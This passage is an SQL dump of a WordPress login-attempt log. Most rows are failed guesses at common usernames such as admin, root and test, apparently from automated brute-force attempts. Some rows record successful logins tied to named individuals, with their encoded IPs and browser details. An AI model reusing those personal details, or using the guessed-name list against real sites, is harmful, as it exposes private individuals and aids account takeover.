Firefox/62.0'),(1203,3060,1563707331.262685,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0DG','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1204,3061,1563708754.360786,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1205,3062,1563709192.978195,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1206,3063,1563709399.967434,1,'loginFailInvalidUsername','companyregistration',0,'\0\0\0\0\0\0\0\0\0\0(Fڥ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1207,3064,1563709794.822465,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1208,3065,1563710044.085099,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\06ZE','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1209,3066,1563710380.906466,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0׍','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1210,3067,1563710932.422248,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0Yk','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1211,3068,1563711414.449083,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0G','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1212,3069,1563739547.497716,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\02> ','Windows Live Writter'),(1213,3070,1563740352.503896,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\01','Poster'),(1214,3071,1563741242.009016,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0˨','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1215,3074,1563742902.321283,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ly','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1216,3075,1563743980.325530,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\0\Z','Windows Live Writter'),(1217,3076,1563744233.643553,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0','WordPress'),(1218,3077,1563744657.449340,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1219,3078,1563746012.513844,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\0;4','WordPress'),(1220,3079,1563746085.095125,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0GF','WordPress'),(1221,3081,1563747688.248026,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0hxM','WordPress'),(1222,3081,1563747688.258930,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0hxM','WordPress'),(1223,3085,1563752318.319891,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0>u','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1224,3088,1563757830.709111,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0^f\r\"','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1225,3097,1563761440.149571,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1226,3098,1563763321.921469,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1227,3099,1563765042.829113,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0D','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1228,3100,1563770611.204848,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0j','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1229,3101,1563772519.690105,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\08','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1230,3102,1563773139.208935,0,'loginOK','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1231,3103,1563774488.293971,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0`@','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1232,3104,1563778385.306035,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0-z?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1233,3105,1563778580.310330,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0G','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'),(1234,3106,1563778601.293765,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0G','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'),(1235,3107,1563780257.132796,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0;=M','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1236,3108,1563784525.628558,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1237,3109,1563786141.303467,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0G','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'),(1238,3110,1563790120.655419,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0g>P','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1239,3273,1563863940.034102,1,'loginFailInvalidUsername','editor',0,'\0\0\0\0\0\0\0\0\0\0[\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1240,3274,1563863947.861711,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0[\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1241,3275,1563863953.046533,1,'loginFailInvalidUsername','alex',0,'\0\0\0\0\0\0\0\0\0\0[\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1242,3276,1563863958.566433,1,'loginFailInvalidUsername','Service',0,'\0\0\0\0\0\0\0\0\0\0[\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1243,3277,1563863966.209889,1,'loginFailInvalidUsername','admin-2',0,'\0\0\0\0\0\0\0\0\0\0[\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1244,3278,1563863971.938460,1,'loginFailInvalidUsername','david',0,'\0\0\0\0\0\0\0\0\0\0[\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1245,3279,1563863978.079516,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0[\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1246,3280,1563863984.315731,1,'loginFailInvalidUsername','sam-mi',0,'\0\0\0\0\0\0\0\0\0\0[\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1247,3281,1563863989.602577,1,'loginFailInvalidUsername','wpadmin',0,'\0\0\0\0\0\0\0\0\0\0[\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1248,3282,1563863994.880745,1,'loginFailInvalidUsername','chris',0,'\0\0\0\0\0\0\0\0\0\0[\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1249,3283,1563864000.586448,1,'loginFailInvalidUsername','admin2',0,'\0\0\0\0\0\0\0\0\0\0[\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1250,3284,1563864007.343407,1,'loginFailInvalidUsername','support',0,'\0\0\0\0\0\0\0\0\0\0[\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1251,3285,1563864013.207182,1,'loginFailInvalidUsername','daniel',0,'\0\0\0\0\0\0\0\0\0\0[\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1252,3286,1563864018.943192,1,'loginFailInvalidUsername','michael',0,'\0\0\0\0\0\0\0\0\0\0[\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1253,3287,1563864028.698724,1,'loginFailInvalidUsername','admin1',0,'\0\0\0\0\0\0\0\0\0\0[\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1254,3288,1563864036.002226,1,'loginFailInvalidUsername','administrador',0,'\0\0\0\0\0\0\0\0\0\0[\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1255,3289,1563864048.091485,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0[\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1256,3503,1563887504.521147,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0G','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'),(1257,3578,1563899033.411362,0,'loginOK','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0il1','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1258,3579,1563901036.428371,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0/[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1259,3580,1563901042.278708,1,'loginFailInvalidUsername','webmaster',0,'\0\0\0\0\0\0\0\0\0\0/[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1260,3581,1563901046.805114,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0/[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1261,3582,1563901052.074763,1,'loginFailInvalidUsername','feed',0,'\0\0\0\0\0\0\0\0\0\0/[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1262,3583,1563901056.755585,1,'loginFailInvalidUsername','editor',0,'\0\0\0\0\0\0\0\0\0\0/[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1263,3584,1563901061.813857,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0/[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1264,3585,1563901067.950341,1,'loginFailInvalidUsername','alex',0,'\0\0\0\0\0\0\0\0\0\0/[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1265,3586,1563901080.490341,1,'loginFailInvalidUsername','Service',0,'\0\0\0\0\0\0\0\0\0\0/[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1266,3587,1563901085.549496,1,'loginFailInvalidUsername','admin-2',0,'\0\0\0\0\0\0\0\0\0\0/[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1267,3588,1563901089.977763,1,'loginFailInvalidUsername','david',0,'\0\0\0\0\0\0\0\0\0\0/[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1268,3589,1563901094.543227,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0/[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1269,3590,1563901099.083383,1,'loginFailInvalidUsername','sam-mi',0,'\0\0\0\0\0\0\0\0\0\0/[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1270,3591,1563906672.871811,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0H','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1271,3592,1563908625.973629,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0-zܧ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1272,3593,1563910635.669516,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0A:','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1273,3594,1563912601.083376,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0|h','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1274,3595,1563914533.527798,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0h1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1275,3596,1563951213.440136,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0G','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'),(1276,3600,1563957787.123203,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0h','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1277,3601,1563957844.889917,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0c','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1278,3602,1563959034.857310,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0ج','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1279,3605,1563961259.857306,1,'loginFailInvalidUsername','demo',0,'\0\0\0\0\0\0\0\0\0\0H','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1280,3606,1563961848.333540,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1281,3607,1563961855.020786,1,'loginFailInvalidUsername','webmaster',0,'\0\0\0\0\0\0\0\0\0\0]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1282,3608,1563961859.325258,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1283,3609,1563961862.739677,1,'loginFailInvalidUsername','feed',0,'\0\0\0\0\0\0\0\0\0\0]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1284,3610,1563961866.663658,1,'loginFailInvalidUsername','editor',0,'\0\0\0\0\0\0\0\0\0\0]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1285,3611,1563961871.314732,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1286,3612,1563961873.969007,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0;H','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1287,3613,1563961875.431193,1,'loginFailInvalidUsername','alex',0,'\0\0\0\0\0\0\0\0\0\0]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1288,3614,1563961879.357657,1,'loginFailInvalidUsername','Service',0,'\0\0\0\0\0\0\0\0\0\0]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1289,3615,1563961883.734284,1,'loginFailInvalidUsername','admin-2',0,'\0\0\0\0\0\0\0\0\0\0]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1290,3616,1563961886.360503,1,'loginFailInvalidUsername','david',0,'\0\0\0\0\0\0\0\0\0\0]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1291,3617,1563961888.865939,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1292,3618,1563961898.017339,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0Ը','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1293,3619,1563962062.864362,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1294,3620,1563962662.558508,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0.e~&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1295,3621,1563963272.911215,1,'loginFailInvalidUsername','blogger',0,'\0\0\0\0\0\0\0\0\0\0#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1296,3622,1563963278.185296,1,'loginFailInvalidUsername','blogger',0,'\0\0\0\0\0\0\0\0\0\0-7\"W','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1297,3623,1563963423.571765,1,'loginFailInvalidUsername','blogger',0,'\0\0\0\0\0\0\0\0\0\0Pӽ~','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1298,3626,1563964666.552789,1,'loginFailInvalidUsername','abcd',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1299,3628,1563966690.617990,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0oǰ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1300,3670,1563967389.069690,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0<(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1301,3672,1563968249.755514,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0M8:','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1302,3673,1563968292.757804,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1303,3674,1563968354.076931,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1304,3675,1563969077.239110,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0hē','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1305,3676,1563969205.675290,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0{) ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1306,3680,1563970674.789198,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0gxD','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1307,3681,1563972020.676591,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0ѧ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1308,3682,1563972161.443099,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0-(k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1309,3684,1563973614.330270,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1310,3685,1563974415.481258,1,'loginFailInvalidUsername','xrumertest',0,'\0\0\0\0\0\0\0\0\0\0;:c','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1311,3686,1563974424.473748,1,'loginFailInvalidUsername','xrumertest',0,'\0\0\0\0\0\0\0\0\0\0.e','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1312,3687,1563975158.253007,1,'loginFailInvalidUsername','androidios',0,'\0\0\0\0\0\0\0\0\0\0h$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1313,3692,1563978294.466937,1,'loginFailInvalidUsername','Admin',0,'\0\0\0\0\0\0\0\0\0\0[0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1314,3693,1563978706.925901,1,'loginFailInvalidUsername','Admin',0,'\0\0\0\0\0\0\0\0\0\0m5F','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1315,3694,1563979098.959961,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\04[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1316,3756,1563979443.246057,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1317,3757,1563979945.942621,1,'loginFailInvalidUsername','demo',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1318,3758,1563979992.083414,1,'loginFailInvalidUsername','demo',0,'\0\0\0\0\0\0\0\0\0\0ν+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1319,3759,1563980881.584113,1,'loginFailInvalidUsername','patricia',0,'\0\0\0\0\0\0\0\0\0\0gjp\r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1320,3760,1563981486.774297,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1321,3761,1563981563.181625,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1322,3762,1563983124.968816,1,'loginFailInvalidUsername','guest',0,'\0\0\0\0\0\0\0\0\0\0&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1323,3763,1563983317.503286,1,'loginFailInvalidUsername','guest',0,'\0\0\0\0\0\0\0\0\0\0{','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1324,3764,1563984048.753087,1,'loginFailInvalidUsername','test1234',0,'\0\0\0\0\0\0\0\0\0\0h+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1325,3765,1563984109.152484,1,'loginFailInvalidUsername','test1234',0,'\0\0\0\0\0\0\0\0\0\0\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1326,3767,1563985657.827169,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0hR','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1327,3768,1563986753.646886,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\048K','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1328,3769,1563987236.343922,1,'loginFailInvalidUsername','Admin',0,'\0\0\0\0\0\0\0\0\0\0X','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1329,3814,1563990603.977443,1,'loginFailInvalidUsername','123456',0,'\0\0\0\0\0\0\0\0\0\0C','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1330,3815,1563990793.230222,1,'loginFailInvalidUsername','123456',0,'\0\0\0\0\0\0\0\0\0\0T','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1331,3816,1563991585.288620,1,'loginFailInvalidUsername','Admin',0,'\0\0\0\0\0\0\0\0\0\0D>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1332,3817,1563991717.987077,1,'loginFailInvalidUsername','Admin',0,'\0\0\0\0\0\0\0\0\0\0gɮ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1333,3818,1563992374.700115,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0G.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1334,3819,1563992408.339038,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0h{','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1335,4040,1564021835.224864,1,'loginFailInvalidUsername','david',0,'\0\0\0\0\0\0\0\0\0\0>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 